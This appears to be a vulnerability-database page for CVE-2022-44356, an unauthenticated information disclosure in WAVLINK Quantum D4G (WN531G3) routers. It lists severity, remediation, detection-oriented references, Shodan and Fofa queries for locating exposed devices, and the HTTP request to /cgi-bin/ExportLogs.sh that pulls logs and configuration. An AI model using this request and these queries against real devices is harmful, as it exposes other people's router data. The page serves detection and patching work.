🔙 목록으로 돌아가기

CVE-2022-44356: WAVLINK Quantum D4G (WL-WN531G3) - Information Disclosure

TitleWAVLINK Quantum D4G (WL-WN531G3) - Information Disclosure
Authorritikchaddha
SeverityHigh
ImpactSuccessful exploitation could lead to sensitive information disclosure.
RemediationApply the latest firmware updates from Wavlink or implement network segmentation to restrict access to the device administration interface.
CVSS Score7.5
EPSS Score0.53391
CVE IDCVE-2022-44356
Shodan Queryhtml:"WN531G3"
Fofa Querybody="WN531G3"
Tags cve cve2022 wavlink exposure wn531g3 vuln

🔍 Vulnerability Description

WAVLINK Quantum D4G (WL-WN531G3) running firmware versions M31G3.V5030.201204 and M31G3.V5030.200325 has an access control issue which allows unauthenticated attackers to download configuration data and log files.

🌐 HTTP Request

GET / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.5.20) Gecko/ Firefox/9.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /cgi-bin/ExportLogs.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-44356.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-44356.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A